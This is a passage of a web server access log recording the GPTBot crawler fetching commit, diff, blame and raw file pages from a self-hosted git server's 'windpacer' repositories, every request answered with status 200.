"/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" [Client 74.7.227.38] [Length 133969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/find/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 7500] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 12480] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" -[17/Feb/2026:13:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 11301] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 11303] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 10953] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" -[17/Feb/2026:13:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 10950] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" -[17/Feb/2026:13:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" -[17/Feb/2026:13:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 10981] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" -[17/Feb/2026:13:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 7491] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 12082] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 7486] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" -[17/Feb/2026:13:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 10939] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" -[17/Feb/2026:13:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 10950] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" -[17/Feb/2026:13:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 11277] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:13:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 11833] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:13:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:13:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 9994] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:13:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:13:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 10135] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:13:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 15189] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/graph" [Client 74.7.227.38] [Length 11573] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 14803] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" [Client 74.7.227.38] [Length 12337] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" -[17/Feb/2026:13:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 11303] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 11300] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" -[17/Feb/2026:13:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch" [Client 74.7.227.38] [Length 12149236] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 28937] [Gzip 10.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:13:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.diff" [Client 74.7.227.38] [Length 801462] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15238] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d.patch" [Client 74.7.227.38] [Length 2981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 12027] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12207] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10837] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16528] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11966] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 10948] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" -[17/Feb/2026:13:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10155] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" -[17/Feb/2026:13:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 10952] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" -[17/Feb/2026:13:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 7487] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" -[17/Feb/2026:13:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" -[17/Feb/2026:13:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10166] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" [Client 74.7.227.38] [Length 9817] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11750] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10139] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" -[17/Feb/2026:13:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10148] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10168] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 